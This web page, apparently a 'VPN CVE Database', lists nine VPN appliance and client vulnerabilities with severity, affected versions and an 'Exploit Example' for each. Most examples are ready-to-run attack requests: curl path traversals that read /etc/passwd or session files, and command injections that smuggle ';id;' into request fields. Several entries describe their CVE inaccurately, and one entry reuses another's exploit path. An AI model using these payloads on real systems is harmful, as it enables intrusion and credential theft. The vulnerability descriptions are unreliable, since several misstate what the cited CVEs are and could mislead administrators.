VPN CVE Database

Comprehensive database of VPN-related vulnerabilities and exploits

Search & Filter CVEs
CVE-2024-5910
Critical
Palo Alto
2024-07-10
9.3
CVSS Score

Command injection vulnerability in Palo Alto Networks GlobalProtect gateways that allows unauthenticated remote code execution on the VPN appliance.

Affected Software:

PAN-OS 10.2 < 10.2.9-h1
PAN-OS 11.0 < 11.0.4-h4
PAN-OS 11.1 < 11.1.3-h10

Exploit Example:

curl -k 'https://target/global-protect/getconfig.esp' -d 'user=admin;id;' -H 'Content-Type: application/x-www-form-urlencoded'
CVE-2023-20269
Critical
Cisco
2023-11-01
9.9
CVSS Score

Local privilege escalation vulnerability in Cisco AnyConnect Secure Mobility Client that allows authenticated local users to elevate privileges to SYSTEM.

Affected Software:

Cisco AnyConnect 4.10.x
Cisco AnyConnect 5.0.x < 5.0.03104

Exploit Example:

python3 anyconnect_privesc.py --target localhost --payload cmd.exe
CVE-2023-46805
Critical
Ivanti
2024-01-10
8.2
CVSS Score

Authentication bypass vulnerability in Ivanti Connect Secure and Policy Secure gateways that allows unauthenticated access to restricted resources.

Affected Software:

Ivanti Connect Secure 9.x
Ivanti Connect Secure 22.x
Ivanti Policy Secure 9.x
Ivanti Policy Secure 22.x

Exploit Example:

curl -k 'https://target/api/v1/totp/user-backup-code/../../../../../../etc/passwd' -H 'Authorization: '
CVE-2021-22893
Critical
Pulse Secure
2021-04-20
10.0
CVSS Score

An unauthenticated remote code execution vulnerability in Pulse Connect Secure that allows attackers to execute arbitrary code on the VPN appliance.

Affected Software:

Pulse Connect Secure 9.0R3/9.1R1 - 9.1R11
Pulse Policy Secure 9.0R3.1 - 9.1R11

Exploit Example:

curl -k 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' -H 'Cookie: DSID=../../../../../../../tmp/sess_[SESSION_ID]'
CVE-2018-13379
High
Fortinet
2019-06-17
9.8
CVSS Score

An improper limitation of a pathname to a restricted directory vulnerability in Fortinet FortiOS allows attackers to download system files via specially crafted HTTP resource requests.

Affected Software:

FortiOS 6.0.0 to 6.0.4
FortiOS 5.6.3 to 5.6.7
FortiOS 5.4.6 to 5.4.12

Exploit Example:

curl -k 'https://target/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
CVE-2020-2021
Critical
Palo Alto
2020-06-29
10.0
CVSS Score

An OS command injection vulnerability in Palo Alto Networks PAN-OS allows for remote code execution in PAN-OS 8.1 versions earlier than 8.1.15.

Affected Software:

PAN-OS 8.1 < 8.1.15
PAN-OS 9.0 < 9.0.9
PAN-OS 9.1 < 9.1.3

Exploit Example:

POST /esp/cms_changeDeviceContext.esp HTTP/1.1 Host: target Content-Type: application/x-www-form-urlencoded deviceType=';id;'
CVE-2020-3452
High
Cisco
2020-07-22
7.5
CVSS Score

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD) could allow an unauthenticated, remote attacker to conduct directory traversal attacks.

Affected Software:

Cisco ASA Software
Cisco FTD Software

Exploit Example:

curl -k --path-as-is https://target/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
CVE-2017-12166
High
OpenVPN
2017-10-04
7.5
CVSS Score

OpenVPN versions before 2.4.4 and 2.3.18 are vulnerable to a buffer overflow vulnerability when key-method 1 is used, potentially leading to code execution.

Affected Software:

OpenVPN < 2.4.4
OpenVPN < 2.3.18

Exploit Example:

# Exploit requires crafted key-method 1 configuration # Details available in security advisory
CVE-2019-11510
Critical
Pulse Secure
2019-04-24
10.0
CVSS Score

In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability.

Affected Software:

Pulse Connect Secure 8.2 < 8.2R12.1
Pulse Connect Secure 8.3 < 8.3R7.1
Pulse Connect Secure 9.0 < 9.0R3.4

Exploit Example:

curl -k 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/'